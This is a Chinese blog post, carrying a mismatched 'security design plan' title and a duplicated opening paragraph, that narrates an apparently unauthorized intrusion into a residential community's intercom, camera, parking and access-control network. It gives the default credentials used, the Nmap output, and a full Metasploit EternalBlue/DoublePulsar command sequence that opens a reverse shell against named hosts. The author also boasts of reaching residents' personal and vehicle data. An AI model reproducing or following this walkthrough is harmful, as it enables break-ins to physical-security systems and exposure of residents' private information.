小区智能安防系统设计方案：一步一步搞定小区的安防系统

小区智能安防系统设计方案：一步一步搞定小区的安防系统通过缺省弱口令进入工程模式，拿到ip地址，网关还有服务器地址大家都知道，一般小区这种内部的网络都是不直接连接到外网的，如果连那也是做了隔离，单独有一个跳板来做转发，这样相对比较安全，但是正常情况都是没外网的，这种局域网系统有两个突出的特点。准备开始之前，博主需要对环境进行一个简单的描述，以便大家能够在脑海中脑补一下整个渗透测试的过程，算是博主在线下渗透的一个例子吧，往后还有对整个商场各种店铺各种的渗透过程，都会一一讲解。好了，废话就不多说了，咱们既然是对网络系统进行渗透测试，自然是得有一个入口，那这个入口在哪找呢？

过程很漫长，想看就耐点心，另外这不是作者破解的哈

前言

博主从小就是一个喜欢把事情简单化的男人，但是现实总是在不经意间给你太多的惊喜，比如不停的搬家。

博主所购的小区对自己的智能化系统宣传的很到位，所以闲下来的时候博主我就对小区的安防系统进行一次简单的渗透，轻松拿下各种安防系统，这篇文章就来详细的说明一下。

准备

开始之前，博主需要对环境进行一个简单的描述，以便大家能够在脑海中脑补一下整个渗透测试的过程，算是博主在线下渗透的一个例子吧，往后还有对整个商场各种店铺各种的渗透过程，都会一一讲解。

好了，废话就不多说了，咱们既然是对网络系统进行渗透测试，自然是得有一个入口，那这个入口在哪找呢？

大家都知道，一般小区这种内部的网络都是不直接连接到外网的，如果连那也是做了隔离，单独有一个跳板来做转发，这样相对比较安全，但是正常情况都是没外网的，这种局域网系统有两个突出的特点。

通过缺省弱口令进入工程模式，拿到ip地址，网关还有服务器地址

拆下对讲机

我擦嘞，这网线也太短了吧，上工具

把网线进行延长方便接交换机、路由器、笔记本之类的设备，最后确认下通讯是否正确

基本准备工作搞定之后就开始进行入侵渗透了

扫描

根据之前撸光猫内网的经验，这里的IP地址肯定是固定的，而且跟住户号是绑定的，如果使用自己的iP地址进行测试，万一出啥问题那不是非常的尴尬，既然现在很多业主都还没有入住，那么IP地址池也有很多的空闲，就使用其他住户的IP地址吧，只要不冲突就行，说干就干，上装备：

一个充电宝、一个路由器、一台笔记本

通电后设置路由器的固定IP

这样笔记本通过无线wifi就可以对IP段进行扫描了，我这使用的扫描软件是Angry IP Scanner，图形界面用起来很爽，而且速度也快

对192.165.0.1/16进行扫描发现存活主机1256个，为了对IP地址快速分类，将存活的IP地址全部导出，编写python脚本对ip的http响应头进行分类，最终分为下面的这几类：

第一类

mini_httpd/1.19 19dec2003

这一类机器是所有的门禁机，包含了住户家里的对讲机，楼栋大堂的门禁机，车库电梯的门禁机，小区大门的门禁机，通过ip地址以及admin / 123456弱口令可以远程控制，同时telnet也可以连接，管理页面功能很全，包括修改密码，控制开门时间，控制门禁机密码，呼叫住户，呼叫物业中心，恢复出厂设置等等，功能丰富，界面如下

第二类

DNVRS-Webs Hikvision-webs/ App-webs/

这三种都是海康威视的监控探头，登录界面有以下几种

只有中间那种可以无限次输错密码进行爆破，其他两种都是输错五次就锁定

第三类

Net Keybord-Webs

这是一个网络键盘，通常用于操作监控的云台转动，比如球机的操作杆，登录界面

密码输错6次就锁定。

第四类

Boa/0.94.13

这个就有意思了，这是车牌识别系统，车辆入库的时候进行车牌识别，拍照存储的机器，也是全部admin admin弱口令直接登录，里面存储了些啥就不多说了，放两张图大家随意感受下

通过对这几种设备的归类扫描，最终确定了几台windows服务器

192.165.15.174 192.165.15.177 192.165.15.190 192.165.15.200 192.165.30.2

使用Nmap扫描结果如下

# Nmap 7.70 scan initiated Fri May 18 23:51:30 2018 as: nmap -iL something_ip.txt -oN scaned.txt -T4 --open Nmap scan report for 192.165.15.174 Host is up (0.063s latency). Not shown: 990 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1433/tcp open ms-sql-s 2383/tcp open ms-olap4 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown Nmap scan report for 192.165.15.190 Host is up (0.046s latency). Not shown: 992 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown Nmap scan report for 192.165.15.200 Host is up (0.030s latency). Not shown: 991 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown Nmap scan report for 192.165.30.2 Host is up (0.064s latency). Not shown: 990 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown # Nmap done at Fri May 18 23:51:46 2018 -- 5 IP addresses (4 hosts up) scanned in 16.25 seconds

很明显，四台机器都开了445端口，其中 192.165.15.174 开了1433端口，明显是sql server数据库，192.165.30.2还开了3389，这台机器是在门禁机里面见过，是门禁系统的服务器。

下面就重点对这几台机器入手，使用msf扫描下看是不是都存在smb漏洞（ms17_010），这漏洞在局域网真的超级好用，扫描截图

发现只有192.165.15.174 不存在ms17_010，其他三台都存在，操作系统分别是

192.165.15.190 win7 sp1 x86

192.165.15.200 win7 sp1 x64

192.165.30.2 win7 sp1 x86

现在目标就非常明确了，但是有个问题，msf自带的利用模块只针对x64版本的操作系统，对于x86版本的系统只能使用其他工具，emmmmm….

一阵思考之后，博主决定先搞定那台64位win7，为了能够正常的反弹shell回来，我把路由器改成桥接模式，本机电脑设置固定IP，这样我的机器就跟目标机器处于相同网络拓扑，反弹自然无压力

so…

msf的用法我这里就不多说了，如果真不知道，可以留言…给出一张run vnc的截图，拿下监控系统

有趣的是这台机器上居然安装了360安全卫士…

注意看上面一张图的那个监控室，管理员面前有三台机器，所以另外两台我下一步就要搞定。

上面说64位win7已经拿下，现在搞定32位机器，使用 https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit 这里的Ruby脚本即可，需要注意的是如果本机是kali 64位的需要安装 wine32，安装方法是

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

而且全程操作需要在root下面，安装完wine32后执行一下 wine32 cmd.exe 这样会自动在/root下面创建.wine目录，这个目录msf会用到

使用

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

将脚本克隆到本地，然后把目录下的deps 目录和rb文件复制到msf的modules路径下，这样既可以使用了（PS：我这里只复制了rb脚本，deps没有复制过去所以命令不太一样），具体命令如下

msf > use exploit/windows/smb/eternalblue_doublepulsar msf exploit(windows/smb/eternalblue_doublepulsar) > set ETERNALBLUEPATH /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/ ETERNALBLUEPATH => /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/ msf exploit(windows/smb/eternalblue_doublepulsar) > set DOUBLEPULSARPATH /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/ DOUBLEPULSARPATH => /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/ msf exploit(windows/smb/eternalblue_doublepulsar) > set TARGETARCHITECTURE x86 TARGETARCHITECTURE => x86 msf exploit(windows/smb/eternalblue_doublepulsar) > set PROCESSINJECT wlms.exe PROCESSINJECT => wlms.exe msf exploit(windows/smb/eternalblue_doublepulsar) > show targets Exploit targets: Id Name -- ---- 0 Windows XP (all services pack) (x86) (x64) 1 Windows Server 2003 SP0 (x86) 2 Windows Server 2003 SP1/SP2 (x86) 3 Windows Server 2003 (x64) 4 Windows Vista (x86) 5 Windows Vista (x64) 6 Windows Server 2008 (x86) 7 Windows Server 2008 R2 (x86) (x64) 8 Windows 7 (all services pack) (x86) (x64) msf exploit(windows/smb/eternalblue_doublepulsar) > set target 8 target => 8 msf exploit(windows/smb/eternalblue_doublepulsar) > set rhost set rhost msf exploit(windows/smb/eternalblue_doublepulsar) > set rhost 192.165.15.190 rhost => 192.165.15.190 msf exploit(windows/smb/eternalblue_doublepulsar) > set lhost 192.165.7.11 lhost => 192.165.7.11 msf exploit(windows/smb/eternalblue_doublepulsar) > exploit

不出意外的话攻击就成功了，给出攻击成功的截图。

第一个是门禁系统，没装杀毒软件，就只有一些门禁卡管理软件

第二个系统是车辆管理系统，车辆出入库时候用的

总结

好了，至此，对小区的安防系统进行了简单的渗透测试，成功拿下关键系统，其中在服务器中还发现了大量的敏感文件，包括业主的个人信息，车辆信息，车辆出入登记信息等等，难怪说各种骚扰电话，这简直要分分钟泄露。

后记

安全是一个整体，千里之堤溃于蚁穴，下一次把门禁卡的复制破解还有自动控制升降杠的综合在一起再写一篇